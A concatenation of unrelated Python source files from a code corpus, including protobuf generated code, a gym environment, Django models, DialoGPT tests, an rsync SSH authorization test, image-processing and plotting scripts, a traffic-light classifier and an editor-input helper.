message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="url_query_parameter",
full_name="google.api.SystemParameter.url_query_parameter",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=207,
serialized_end=288,
)
_SYSTEMPARAMETERS.fields_by_name["rules"].message_type = _SYSTEMPARAMETERRULE
_SYSTEMPARAMETERRULE.fields_by_name["parameters"].message_type = _SYSTEMPARAMETER
DESCRIPTOR.message_types_by_name["SystemParameters"] = _SYSTEMPARAMETERS
DESCRIPTOR.message_types_by_name["SystemParameterRule"] = _SYSTEMPARAMETERRULE
DESCRIPTOR.message_types_by_name["SystemParameter"] = _SYSTEMPARAMETER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
SystemParameters = _reflection.GeneratedProtocolMessageType(
"SystemParameters",
(_message.Message,),
{
"DESCRIPTOR": _SYSTEMPARAMETERS,
"__module__": "google.api.system_parameter_pb2"
# @@protoc_insertion_point(class_scope:google.api.SystemParameters)
},
)
_sym_db.RegisterMessage(SystemParameters)
SystemParameterRule = _reflection.GeneratedProtocolMessageType(
"SystemParameterRule",
(_message.Message,),
{
"DESCRIPTOR": _SYSTEMPARAMETERRULE,
"__module__": "google.api.system_parameter_pb2"
# @@protoc_insertion_point(class_scope:google.api.SystemParameterRule)
},
)
_sym_db.RegisterMessage(SystemParameterRule)
SystemParameter = _reflection.GeneratedProtocolMessageType(
"SystemParameter",
(_message.Message,),
{
"DESCRIPTOR": _SYSTEMPARAMETER,
"__module__": "google.api.system_parameter_pb2"
# @@protoc_insertion_point(class_scope:google.api.SystemParameter)
},
)
_sym_db.RegisterMessage(SystemParameter)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| StarcoderdataPython |
1705320 | import sys
import math
import gym
from gym import spaces, logger
from gym.utils import seeding
import numpy as np
from feh_simulator.simulator import Simulator
class fehEnv(gym.Env):
def __init__(self):
self.width = 6
self.height = 8
# input are row, col, verbose, difficulty
self.simulator = Simulator()
self.viewer = None
self.seed()
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def step(self, action):
action_space = simulator.get_action_space()
assert action_space.contains(action), "%r (%s) invalid"%(action, type(action))
s, r, d = self.simulator.step(action)
return s, r, d
def render(self):
screen_width = 600
screen_height = 400
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.Viewer(screen_width, screen_height)
return self.viewer.render(return_rgb_array = mode=='rgb_array')
def reset(self):
s, r, d = self.simulator.reset()
return s, r, d
def main(argv):
env = fehEnv()
s, r, done = env.reset()
env.render()
# while not done:
# action = simu.get_action_space()
# a = None
# for a_ in action:
# if a_.des_unit is not None:
# a = a_
# break
# if a is None:
# a = random.choice(action)
# s, r, done = simu.step(a)
# # print_info(s, r, done)
# print_info(s, r, done)
# s, r, done = simu.reset()
# while not done:
# action = simu.get_action_space()
# a = None
# for a_ in action:
# if a_.des_unit is not None:
# a = a_
# break
# if a is None:
# a = random.choice(action)
# s, r, done = simu.step(a)
# # print_info(s, r, done)
# print_info(s, r, done)
if __name__ == "__main__":
main(sys.argv)
| StarcoderdataPython |
3354658 | <gh_stars>0
from django.conf import settings
from django.db import models
class Category(models.Model):
"Generated Model"
name = models.CharField(
max_length=255,
)
icon = models.URLField()
description = models.TextField(
null=True,
blank=True,
)
is_recurring = models.BooleanField(
null=True,
blank=True,
)
class Subcategory(models.Model):
"Generated Model"
name = models.CharField(
max_length=255,
)
category = models.ForeignKey(
"task_category.Category",
on_delete=models.CASCADE,
related_name="subcategory_category",
)
description = models.TextField(
null=True,
blank=True,
)
# Create your models here.
| StarcoderdataPython |
4841063 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import parlai.utils.testing as testing_utils
from parlai.core.agents import create_agent
@testing_utils.skipUnlessGPU
class TestDialogptModel(unittest.TestCase):
"""
Test of DialoGPT model.
"""
def _test_batchsize(self, batchsize, add_start_token):
utterances = [
'How is your day so far?',
'I hope you you have a good day.',
"Nice to meet you. My name is John. ",
"I've got a feeling we're not in Kansas anymore.",
]
opt = {
'model': 'hugging_face/dialogpt',
'gpt2_size': 'small',
'text_truncate': 100,
'label_truncate': 20,
'beam_min_length': 1,
'inference': 'beam',
'beam_size': 1,
'add_special_tokens': True,
'batchsize': batchsize,
'add_start_token': add_start_token,
}
dialogpt = create_agent(opt)
results_single = []
agents = [dialogpt.clone() for _ in utterances]
for u, a in zip(utterances, agents):
a.observe({'text': u, 'episode_done': True})
generation = a.act()['text']
results_single.append(generation)
results_batched = []
for idx in range(len(utterances) // batchsize):
agents = [dialogpt.clone() for _ in range(batchsize)]
batch = utterances[idx * batchsize : (idx + 1) * batchsize]
obs = []
for i, a in enumerate(agents):
obs.append(a.observe({'text': batch[i], 'episode_done': True}))
generations = [x['text'] for x in dialogpt.batch_act(obs)]
results_batched += generations
assert results_single == results_batched
def test_batchsize(self):
"""
Ensures dialogpt provides the same generation results regardless of batchsize.
"""
# Test throwing the RuntimeError with add_special_tokens = False and batchsize > 1
with self.assertRaises(RuntimeError):
create_agent(
{
'model': 'hugging_face/dialogpt',
'add_special_tokens': False,
'batchsize': 2,
}
)
for batchsize in [1, 2, 4]:
for add_start_token in [True, False]:
with self.subTest(
f'test_batchsize with bs={batchsize} and add_start_token={add_start_token}'
):
self._test_batchsize(batchsize, add_start_token)
def test_start_token(self):
"""
Test RuntimeError is thrown when add_start_token = True and yet add_special_tokens = False
"""
with self.assertRaises(RuntimeError):
create_agent(
{
'model': 'hugging_face/dialogpt',
'add_special_tokens': False,
'add_start_token': True,
}
)
def test_nospecialtok(self):
"""
Test generation consistency for off-the-shelf dialogpt models.
"""
test_cases = [
("What a nice weather!", "I'm in the UK and it's raining here."),
("Nice to meet you!", "Hello! I'm from the future!"),
]
opt = {
'model': 'hugging_face/dialogpt',
'gpt2_size': 'small',
'text_truncate': 100,
'label_truncate': 20,
'beam_min_length': 1,
'inference': 'beam',
'beam_size': 1,
'add_special_tokens': False,
'batchsize': 1,
}
dialogpt = create_agent(opt)
for text, label in test_cases:
dialogpt.observe({'text': text, 'episode_done': True})
response = dialogpt.act()
assert response['text'] == label
@testing_utils.retry(ntries=3, log_retry=True)
def test_dialogpt(self):
"""
Checks that DialoGPT gets a certain performance on the integration test task.
"""
valid, test = testing_utils.train_model(
dict(
task='integration_tests:overfit',
model='hugging_face/dialogpt',
add_special_tokens=True,
add_start_token=True,
optimizer='adam',
learningrate=1e-3,
batchsize=4,
num_epochs=100,
validation_every_n_epochs=5,
validation_metric='ppl',
short_final_eval=True,
skip_generation=True,
)
)
self.assertLessEqual(valid['ppl'], 4.0)
self.assertLessEqual(test['ppl'], 4.0)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1719351 | '''Test rsync SSH helper'''
import pytest
from hazelsync.ssh import Unauthorized
from hazelsync.ssh.rsync import RsyncSsh
def test_authorize_allow():
cmd_line = 'rsync --server --sender -logDtpArRe.iLsfxC --numeric-ids . /opt/data'
helper = RsyncSsh(dict(allowed_paths=['/opt/data']))
helper.authorize(cmd_line)
def test_authorize_reject():
cmd_line = 'rsync --server --sender -logDtpArRe.iLsfxC --numeric-ids . /opt/data1'
helper = RsyncSsh(dict(allowed_paths=['/opt/data']))
with pytest.raises(Unauthorized):
helper.authorize(cmd_line)
def test_authorize_string_path():
cmd_line = 'rsync --server --sender -logDtpArRe.iLsfxC --numeric-ids . /opt/data'
helper = RsyncSsh(dict(allowed_paths='/opt/data'))
helper.authorize(cmd_line)
| StarcoderdataPython |
3363661 | <filename>transom-elevation/elevations_utils.py
import cv2
import numpy as np
import csv
def corrected_perspective(image):
"""Return image with corrected perspective"""
# convert BGR to RGB
img = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# project image to vertical plane
# this is based on first frame of TR5-R1.94A1V
# camera position shouldn't change between runs
# getPerspectiveTransform uses four points that *should* be a rectangle
# and four points that *make* a rectangle, to which the original points
# are mapped by warpPerspective
initial_rect = np.float32([[732, 480],
[1151, 483],
[1144, 576],
[741, 572]])
final_rect = np.float32([[732, 480],
[1151, 480],
[1151, 576],
[732, 576]])
matrix = cv2.getPerspectiveTransform(initial_rect, final_rect)
proj = cv2.warpPerspective(img, matrix, (1920, 1080))
return proj
def masked_image(proj_image, lower_range, upper_range):
"""Return image with specified color mask"""
# hide everything but selected color
# use hsv for easier matching of hues
hsv = cv2.cvtColor(proj_image, cv2.COLOR_RGB2HSV)
mask = cv2.inRange(hsv, lower_range, upper_range)
return mask
def largest_contour(cropped_image):
"""Return contour with largest area from image"""
# "blacks out" image behind mask, then finds boundaries of largest
# contour around the mask (sorted by internal contour area)
gray = cropped_image
blur = cv2.GaussianBlur(gray, (5,5), 0)
thresh = cv2.adaptiveThreshold(blur, 255, 1, 1, 11, 2)
contours, hierarchy = cv2.findContours(thresh,
cv2.RETR_TREE,
cv2.CHAIN_APPROX_SIMPLE)
best_cnt = sorted(contours,
key=lambda c: cv2.contourArea(c),
reverse=True)[0]
return best_cnt
def elevations(transom_contour, waterline_contour, data_path):
"""Return elevations from contours"""
# we have waterline_contour and transom_contour
# find top left and right corners of transom
# split vessel into buttocks
# find most vertical waterline point at each buttock
# scale and find coordinates of waterline relative to transom
# find boundaries of transom to define "box"
transom_l = max(transom_contour,
key=lambda r: r[0][0])[0][0]
transom_r = min(transom_contour,
key=lambda r: r[0][0])[0][0]
transom_b = max(transom_contour,
key=lambda r: r[0][1])[0][1]
transom_t = min(transom_contour,
key=lambda r: r[0][1])[0][1]
# find top corners of transom by distance from top corners of "box"
transom_tl = min(transom_contour,
key=lambda r: (r[0][0] - transom_l) ** 2 + (r[0][1] - transom_t) ** 2)[0]
transom_tr = min(transom_contour,
key=lambda r: (r[0][0] - transom_r) ** 2 + (r[0][1] - transom_t) ** 2)[0]
# find x coordinates of edges of waterline by distance from bottom corners of "box"
waterline_l = min(waterline_contour,
key=lambda r: (r[0][0] - transom_l) ** 2 + (r[0][1] - transom_b) ** 2)[0][0]
waterline_r = min(waterline_contour,
key=lambda r: (r[0][0] - transom_r) ** 2 + (r[0][1] - transom_b) ** 2)[0][0]
# split vessel into buttocks
# currently just splits space between edges of waterline into 6 equal portions
waterline_span = waterline_r - waterline_l
buttocks = []
for b in range(7):
buttocks.append(waterline_l + (b / 6) * waterline_span)
# find raw wave heights at each buttock
# this is difficult because contours aren't defined at every x coordinate
# so they are not necessarily defined at each buttock
# to remedy this, we search the closest 40 points (by distance in x from buttock)
# on the waterline coordinate, then find the closest two points
# (by distance in x and y from buttock and top of transom)
# and then interpolate between the two points to find the value of y
# at the buttock's x coordinate
raw_wave_heights = []
for x in buttocks:
heights_search = sorted(waterline_contour, key=lambda r: abs(x - r[0][0]))[:40]
sorted_heights = sorted(heights_search, key=lambda r: r[0][1] ** 2 + (r[0][0]-x) ** 2)
heights_x = [sorted_heights[0][0][0], sorted_heights[1][0][0]]
heights_y = [sorted_heights[0][0][1], sorted_heights[1][0][1]]
height = np.interp(x, heights_x, heights_y)
raw_wave_heights.append(height)
# find scaled wave heights
# currently experiencing issues, so we make corrections later
# theoretically, this should work on its own
scale = 0.23 / (transom_tr[0] - transom_tl[0]) # beam is 0.23 m
transom_height = (transom_tr[1] + transom_tl[1]) / 2
if data_path.find("T1") > 0 or data_path.find("T4") > 0:
transom_to_waterline = 0.10 / scale # T1 or T4
elif data_path.find("T5") > 0:
transom_to_waterline = 0.09 / scale # T5
unscaled_wave_heights = [h - (transom_height + transom_to_waterline)
for h in raw_wave_heights]
wave_heights = [-h * scale for h in unscaled_wave_heights]
# make corrections for hulls
if data_path.find("T1") > 0:
wave_heights = [0.1 - (h / 2) for h in wave_heights]
elif data_path.find("T4") > 0:
wave_heights = [0.175 - h for h in wave_heights]
else: # assume T5
wave_heights = [0.1 - (h / 2) for h in wave_heights]
return wave_heights
def test_mask(frame):
""" Tests mask on singular frame """
image_name = "../images/frame%d.jpg" % frame
img = cv2.imread(image_name)
# this is temporary
# replace with whatever mask you need to test
tsm_low = np.array([18,150,130])
tsm_high = np.array([24,255,215])
wtl_low = np.array([22,102,105])
wtl_high = np.array([40,255,200])
# standard steps for finding contours
prj = corrected_perspective(img)
tsm = masked_image(prj, tsm_low, tsm_high)
transom = largest_contour(tsm)
wtl = masked_image(prj, wtl_low, wtl_high)
waterline = largest_contour(wtl)
# draw contours on projected image
cv2.drawContours(prj, [transom], 0, 0, 2)
cv2.drawContours(prj, [waterline], 0, 0, 2)
cv2.cvtColor(prj, cv2.COLOR_BGR2RGB)
# output image for viewing
cv2.imwrite("../images/testing/frame%dtest.jpg" % frame, prj)
def write_elevations(heights, data_path):
""" Write elevations data to CSV file """
with open(data_path,'a', newline='') as data:
write = csv.writer(data)
write.writerows([heights])
def get_elevations(data_path):
""" Finds and writes elevations time history for each frame in ../images"""
for frame in range(1500):
image_name = "../images/frame%d.jpg" % frame
img = cv2.imread(image_name)
# switch for hull masks
# TODO: T4 mask still needs work
if data_path.find("T1") > 1:
tsm_low = np.array([21,147,130])
tsm_high = np.array([35,255,200])
wtl_low = np.array([29,116,105])
wtl_high = np.array([43,255,224])
elif data_path.find("T4") > 1:
tsm_low = np.array([18,150,130])
tsm_high = np.array([24,255,215])
wtl_low = np.array([22,102,105])
wtl_high = np.array([40,255,200])
elif data_path.find("T5") > 1:
tsm_low = np.array([26,150,130])
tsm_high = np.array([30,255,215])
wtl_low = np.array([30,204,105])
wtl_high = np.array([40,255,180])
else: # catch any other hulls in filename
tsm_low = np.array([26,150,130])
tsm_high = np.array([30,255,215])
wtl_low = np.array([30,204,105])
wtl_high = np.array([40,255,224])
# standard steps for finding contours
prj = corrected_perspective(img)
tsm = masked_image(prj, tsm_low, tsm_high)
transom = largest_contour(tsm)
wtl = masked_image(prj, wtl_low, wtl_high)
waterline = largest_contour(wtl)
heights = elevations(transom, waterline, data_path)
write_elevations(heights, data_path)
print("Video processing complete.")
| StarcoderdataPython |
3244643 | <gh_stars>0
# -----------------------------------------------------------------------------------------
# Plot functions for MILP MESPP RISK-AWARE
# -----------------------------------------------------------------------------------------
import os
from matplotlib import pyplot as plt
# TODO IMPORT FROM THE ORIGINAL MILP_MESPP REPO
def compose_and_clean(path_to_folder: str):
compose_video(path_to_folder)
delete_frames(path_to_folder)
def compose_video(path_to_folder: str):
"""Use plots as frames and make a short video"""
# print(path_now)
print("Composing video")
command_to_run = "ffmpeg -r 20 -f image2 -i " + path_to_folder + \
"/frame_%04d.png -vcodec libx264 -crf 18 -pix_fmt yuv420p " \
+ path_to_folder + "/a_no_sync.mp4 -y"
os.system(command_to_run)
print("Video is done")
def delete_frames(path_to_folder: str, key_name='frame'):
"""Delete frames used to make the video to save space"""
for filename in os.listdir(path_to_folder):
if filename.startswith(key_name) and filename.endswith('.png'):
my_file = path_to_folder + "/" + filename
os.remove(my_file)
print("Frames were deleted")
return
def define_fonts():
"""Define dictionary with fonts for plotting"""
n_fts = 4
my_font = create_dict(list(range(0, n_fts)), None)
my_sizes = create_dict(list(range(0, n_fts)), 10)
# font and sizes
my_sizes[0] = 13
my_sizes[1] = 12
my_sizes[2] = 11
my_sizes[3] = 9
# title - red and bold
my_font[0] = {'family': 'serif', 'color': 'darkred', 'weight': 'bold', 'size': my_sizes[0],
'horizontalalignment': 'center'}
# subtitle - dark blue and bold
my_font[1] = {'family': 'serif', 'color': 'darkblue', 'weight': 'bold', 'size': my_sizes[1],
'horizontalalignment': 'center'}
# regular text - gray
my_font[2] = {'family': 'serif', 'color': 'darkgray', 'weight': 'normal', 'size': my_sizes[3],
'horizontalalignment': 'center'}
# regular text - black
my_font[3] = {'family': 'serif', 'color': 'black', 'weight': 'normal', 'size': my_sizes[3],
'horizontalalignment': 'center'}
return my_font
def define_fonts2():
my_font = define_fonts()
my_font[2] = {'family': 'serif', 'color': 'black', 'weight': 'bold', 'size': 11,
'horizontalalignment': 'center'}\
my_font[3] = my_font[2]
return my_font
def place_image(im, ax_arr, my_subs: list):
""" place image in subplot and take out ticks and stuff"""
if len(my_subs) > 1:
# plt.tight_layout()
new_left = 0.1
new_right = 0.9
new_bottom = 0.1
new_top = 0.9
plt.subplots_adjust(wspace=0.1, hspace=0, left=new_left, right=new_right, bottom=new_bottom, top=new_top)
for k in my_subs:
ax_arr[k].imshow(im[k])
ax_arr[k].set_xticklabels([])
ax_arr[k].set_xticks([])
ax_arr[k].set_yticklabels([])
ax_arr[k].set_yticks([])
ax_arr[k].axis('off')
else:
ax_arr.imshow(im[0])
ax_arr.set_xticklabels([])
ax_arr.set_xticks([])
ax_arr.set_yticklabels([])
ax_arr.set_yticks([])
ax_arr.axis('off')
return
def mount_frame(path_and_fig, t: int, my_words: dict, n_sub=1, video=False):
"""Mount frame for video
:path_and_fig: path+name(s) of figure(s)
:t: time step
:my_words: dict with 3 keys in order my_title, unit of time, subtitle
:n_sub: number of subplots"""
# ----------------
my_font = define_fonts()
# -----------------
# how many subplots
my_subs = list(range(0, n_sub))
# create figure with subplots
fig_1, ax_arr = plt.subplots(1, n_sub, figsize=(9, 5), dpi=600)
# retrieve graph plots as images
im = {}
if n_sub == 1:
if isinstance(path_and_fig, str):
im[0] = plt.imread(path_and_fig)
else:
im[0] = plt.imread(path_and_fig[2])
else:
for i in my_subs:
im[i] = plt.imread(path_and_fig[i])
# -------------------
# plot text
# insert time step
my_words[0]['text'] = my_words[0]['text'] + str(t)
# title and subtitle
for line in range(0, 2):
my_text = my_words[line]['text']
x, y = my_words[line]['xy']
fig_1.text(x, y, my_text, fontdict=my_font[line])
if n_sub == 3:
for col in range(1, 5):
my_text = my_words[col]['text']
x, y = my_words[col]['xy']
# same for all cols
idx = 1
fig_1.text(x, y, my_text, fontdict=my_font[idx])
for col in range(5, 11):
my_text = my_words[col]['text']
x, y = my_words[col]['xy']
# same for all sub cols
idx = 2
fig_1.text(x, y, my_text, fontdict=my_font[idx])
# labels
my_hazard_labels(fig_1)
# cax = plt.axes([0.85, 0.1, 0.075, 0.8])
# plt.colorbar(cax=cax)
# # -------------------
# take out axis stuff
place_image(im, ax_arr, my_subs)
# -------------------
# save in folder
frame_idx = t
save_frame(path_and_fig, frame_idx, video)
def save_frame(path_and_fig, frame_idx, video=False, key='hazard'):
path_to_folder = os.path.dirname(path_and_fig[0])
if video:
save_copied_frames(path_to_folder, frame_idx)
else:
save_one_frame(path_to_folder, frame_idx, key)
return
def save_one_frame(path_to_folder, frame_idx, key='hazard'):
my_format = ".png"
frame_num = frame_idx
frame_string = str(frame_num)
frame_string = frame_string.rjust(4, "0")
fname = path_to_folder + "/" + key + "_" + frame_string + my_format
# plt.figure(figsize=(4, 8), dpi=400)
plt.savefig(fname, facecolor=None, edgecolor=None,
orientation='landscape', papertype=None,
transparent=True)
def save_copied_frames(path_to_folder: str, frame_idx: int, n_frames_per=60):
"""Multiply frames for video"""
my_format = ".png"
# save the frame
# change n_start to 140 for complete video 140 # n_frame_per * 3
n_start = 0
for i in range(n_frames_per):
frame_num = n_start + i + frame_idx * n_frames_per
frame_string = str(frame_num)
frame_string = frame_string.rjust(4, "0")
fname = path_to_folder + "/" + "frame_" + frame_string + my_format
# plt.figure(figsize=(4, 8), dpi=400)
plt.savefig(fname, facecolor=None, edgecolor=None, orientation='landscape', transparent=True)
def my_rooms_label(fig_1, xy: list, rooms, f_size=12):
for i, r in enumerate(rooms):
c = 0
if r == 'HALL 1':
c = 270
x = xy[i][0]
y = xy[i][1]
my_font = {'family': 'sans-serif', 'color': 'grey', 'weight': 'heavy', 'size': f_size,
'horizontalalignment': 'left'}
fig_1.text(x, y, rooms[i], fontdict=my_font, rotation=c)
return fig_1
def my_hazard_labels(fig_1, xy=None, f_size=12):
levels = [1, 2, 3, 4, 5]
# level_label = ['Low', 'Moderate', 'High', 'Very High', 'Extreme']
# level_color = ['green', 'blue', 'yellow', 'orange', 'red']
level_color = color_levels(True)
level_label = label_levels()
my_font = {}
if xy is None:
x, y = 0.31, 0.1
else:
x, y = xy[0], xy[1]
x_, y_ = -6, 3.8
for i in levels:
my_font[i] = {'family': 'sans-serif', 'color': 'black', 'weight': 'heavy', 'size': f_size,
'horizontalalignment': 'left'}
plt.plot(x_, y_, color=level_color[i], marker='o', markersize=6)
fig_1.text(x, y, level_label[i], fontdict=my_font[i])
y = y + 0.06 # 0.08
y_ = y_ + 4.7
return fig_1
def empty_my_words(n: int):
my_words = create_dict(list(range(0, n)), None)
for i in range(0, n):
my_words[i] = {'text': '', 'xy': (0.0, 0.0)}
return my_words
def color_levels(normalized=False):
"""Change colors here"""
level = create_dict([1, 2, 3, 4, 5], None)
# (R, G, B)
# yellow = (1, 1, 0)
# orange =
# green
level[1] = (60, 180, 60)
# yellow-green
level[2] = (200, 200, 30)
# yellow
level[3] = (240, 215, 40)
# orange
level[4] = (250, 120, 50)
# red
level[5] = (255, 30, 30)
if normalized is True:
for k in level.keys():
r = level[k][0]
g = level[k][1]
b = level[k][2]
level[k] = (r/255, g/255, b/255)
return level
def label_levels():
labels = create_dict(list(range(1, 6)), '')
labels[1] = 'Low'
labels[2] = 'Moderate'
labels[3] = 'High'
labels[4] = 'Very High'
labels[5] = 'Extreme'
return labels
def match_level_color(my_level: int):
"""Define color for levels"""
colors = color_levels(True)
my_color = set_vertex_color(colors[my_level])
return my_color
def set_vertex_color(my_color: tuple):
alpha = 1
red, green, blue = my_color
return red, green, blue, alpha
def create_dict(my_keys, default_value):
if isinstance(default_value, dict):
print('Starting default value as {} will cause everything to have the same value')
default_value = None
my_dict = {}
for k in my_keys:
my_dict[k] = default_value
return my_dict
# ------------------------------------------------------------
def mount_coord_frame(path_and_fig, t: int, my_words: dict, n_sub=1, video=False):
"""Mount frame for video
:path_and_fig: path+name(s) of figure(s)
:t: time step
:my_words: dict with 3 keys in order my_title, subtitle, left title, right title
:n_sub: number of subplots"""
# ----------------
my_font = define_fonts2()
# -----------------
# how many subplots
my_subs = list(range(0, n_sub))
# create figure with subplots
fig_1, ax_arr = plt.subplots(1, n_sub, figsize=(9, 5), dpi=600)
# retrieve graph plots as images
im = {}
if n_sub == 1:
if isinstance(path_and_fig, str):
im[0] = plt.imread(path_and_fig)
else:
im[0] = plt.imread(path_and_fig[2])
else:
for i in my_subs:
im[i] = plt.imread(path_and_fig[i])
# -------------------
# plot text
# insert time step
# title and subtitle
for line in my_words.keys():
my_text = my_words[line]['text']
x, y = my_words[line]['xy']
fig_1.text(x, y, my_text, fontdict=my_font[line])
if n_sub == 3:
for col in range(1, 5):
my_text = my_words[col]['text']
x, y = my_words[col]['xy']
# same for all cols
idx = 1
fig_1.text(x, y, my_text, fontdict=my_font[idx])
for col in range(5, 11):
my_text = my_words[col]['text']
x, y = my_words[col]['xy']
# same for all sub cols
idx = 2
fig_1.text(x, y, my_text, fontdict=my_font[idx])
# labels
# my_hazard_labels(fig_1)
# cax = plt.axes([0.85, 0.1, 0.075, 0.8])
# plt.colorbar(cax=cax)
# # -------------------
# take out axis stuff
place_image(im, ax_arr, my_subs)
# -------------------
# save in folder
frame_idx = t
save_frame(path_and_fig, frame_idx, video, 'frame')
class CustomizePlot:
def __init__(self):
# line specs
self.line_style = 'solid'
self.line_color = 'k'
self.line_width = 2
# marker specs
self.marker = None
self.marker_color = self.line_color
self.marker_size = 5
# title
self.title = None
self.subtitle = None
self.fonts = self.set_fonts()
# other text
self.text = None
self.text_pos = self.set_pos()
# axis
self.xlabel = None
self.ylabel = None
# legend
self.legend = None
# orientation
self.orientation = 'landscape'
@staticmethod
def set_fonts():
size_title = 13
size_subtitle = 12
size_text = 10
my_fonts = dict()
my_fonts[0] = {'family': 'serif', 'color': 'darkblue', 'weight': 'normal', 'size': size_subtitle,
'horizontalalignment': 'center'}
my_fonts[1] = {'family': 'serif', 'color': 'darkred', 'weight': 'normal', 'size': size_title,
'horizontalalignment': 'center'}
my_fonts[2] = {'family': 'serif', 'color': 'darkgray', 'weight': 'normal', 'size': size_text,
'horizontalalignment': 'center'}
my_fonts[3] = {'family': 'serif', 'color': 'black', 'weight': 'normal', 'size': size_title,
'horizontalalignment': 'center'}
my_fonts[4] = {'family': 'serif', 'color': 'black', 'weight': 'normal', 'size': size_title,
'horizontalalignment': 'center'}
return my_fonts
def set_pos(self, list_pos=None):
positions = dict()
if list_pos is None:
positions[0] = (0.5, 0.93)
positions[1] = (0.5, 0.88)
positions[2] = (0.5, 0.83)
positions[3] = (0.30, 0.05)
positions[4] = (0.75, 0.05)
return positions
else:
i = 0
for el in list_pos:
positions[i] = el
i += 1
self.text_pos = positions
def set_l_style(self, my_style: str):
self.line_style = my_style
def set_l_color(self, my_color: str):
self.line_color = my_color
self.marker_color = my_color
def set_l_width(self, my_w: int):
self.line_width = my_w
def set_marker(self, my_marker: str):
self.marker = my_marker
def set_marker_size(self, my_size: int):
self.marker_size = my_size
def set_marker_color(self, my_color: str):
self.marker_color = my_color
def set_text(self, my_text: dict):
self.text = my_text
| StarcoderdataPython |
1653726 | A, B = map(int, input().split())
print(A * B - (A + B - 1))
| StarcoderdataPython |
1614431 | <filename>ros/src/tl_detector/light_classification/tl_classifier.py
import rospy
from styx_msgs.msg import TrafficLight
import tensorflow as tf
import numpy as np
import datetime
import cv2
class TLClassifier(object):
def __init__(self, is_sim):
if is_sim:
#PATH_TO_MODEL = 'light_classification/models/rfcn_resnet101_coco_sim/frozen_inference_graph.pb'
#PATH_TO_MODEL = r'light_classification/models/ssd_inception_v2_coco_sim/frozen_inference_graph.pb'
#PATH_TO_MODEL = r'light_classification/models/ssd_inception_v2_coco_150_150_sim/frozen_inference_graph.pb'
PATH_TO_MODEL = r'light_classification/models/ssd_inception_v2_coco_300_300_sim/frozen_inference_graph.pb'
else:
#PATH_TO_MODEL = r'light_classification/models/rfcn_resnet101_coco_byrd/frozen_inference_graph.pb'
PATH_TO_MODEL = r'light_classification/models/ssd_inception_v2_coco_byrd/frozen_inference_graph.pb'
self.graph = tf.Graph()
with self.graph.as_default():
with tf.gfile.GFile(PATH_TO_MODEL, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
tf.import_graph_def(graph_def, name='')
self.image_tensor = self.graph.get_tensor_by_name('image_tensor:0')
self.boxes = self.graph.get_tensor_by_name('detection_boxes:0')
self.scores = self.graph.get_tensor_by_name('detection_scores:0')
self.classes = self.graph.get_tensor_by_name('detection_classes:0')
self.num_detections = self.graph.get_tensor_by_name('num_detections:0')
self.sess = tf.Session(graph=self.graph)
def integrate_scores(self,scores,classes):
tmp = {1:0,2:0,3:0,4:0}
total = 0
for s,c in zip(scores,classes):
tmp[c]+=s
total+=s
mx = 0.5
sel = 4
for key,val in tmp.items():
if val/total>mx:
sel= key
mx= val/total
return (sel,mx)
def get_classification(self, image):
"""Determines the color of the traffic light in the image
Args:
image (cv::Mat): image containing the traffic light
Returns:
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
"""
image_size = cv2.resize(image,(150,150))
image_exp = np.expand_dims(image_size, axis=0)
#image_exp = np.expand_dims(image, axis=0)
start = datetime.datetime.now()
(boxes, scores, classes, num_detection) = self.sess.run([self.boxes, self.scores, self.classes, self.num_detections], feed_dict={self.image_tensor: image_exp})
end = datetime.datetime.now()
c = end - start
#print("Time for classification: ", c.total_seconds())
boxes = np.squeeze(boxes)
scores = np.squeeze(scores)
classes = np.squeeze(classes).astype(np.int32)
#rospy.loginfo("scores: %f, classes: %d", scores[0], classes[0])
#rospy.loginfo("scores: %s, classes: %s", str(scores), str(classes))
#print("scores: ",scores[0], ", classes: ", classes[0])
out = self.integrate_scores(scores,classes)
#rospy.loginfo("scores: %f, classes: %d",out[1] , out[0])
#civ2.imwrite('/home/student/output/'+str(start)+'_{0}_{1:.2f}'.format(out[0],out[1])+'.png',image_size)
if out[1] > 0.5:
if out[0] == 1:
return TrafficLight.GREEN
elif out[0] == 2:
return TrafficLight.RED
elif out[0] == 3:
return TrafficLight.YELLOW
#if scores[0] > 0.5:
# if classes[0] == 1:
# return TrafficLight.GREEN
# elif classes[0] == 2:
# return TrafficLight.RED
# elif classes[0] == 3:
# return TrafficLight.YELLOW
return TrafficLight.UNKNOWN
| StarcoderdataPython |
30093 | <reponame>JcDelay/pycr<gh_stars>1-10
"""This module provides convenient use of EDITOR"""
import os
import subprocess
import tempfile
from libpycr.config import Config
def get_editor():
"""Return the user's editor, or vi if not defined
:rtype: str
"""
return os.environ.get('EDITOR') or os.environ.get('VISUAL') or 'vi'
def strip_comments(data, line_comment='#'):
"""Strip comments from the input string and return the result
:param data: multiline text to strip comments from
:type data: str
:param line_comment: the line comment delimiter
:type line_comment: str
:rtype: str
"""
return '\n'.join([l for l in data.splitlines()
if l and l[0] != line_comment]).strip()
def raw_input_editor(default=None):
"""Request user input by firing an editor
Like the built-in raw_input(), except that it uses a visual text editor for
ease of editing.
:param editor: the editor to use
:type editor: str
:param default: the initital content of the editor
:type default: str | None
"""
editor = Config.get('core.editor', get_editor())
with tempfile.NamedTemporaryFile(mode='r+', delete=False) as tmpfile:
if default:
tmpfile.write(default)
tmpfile.flush()
# NOTE: We need to close then re-open the file after edition to ensure
# that buffers are correctly emptied on all platforms.
tmpfile.close()
subprocess.check_call([editor, tmpfile.name])
with open(tmpfile.name) as comment_file:
comment = comment_file.read().strip()
os.unlink(tmpfile.name)
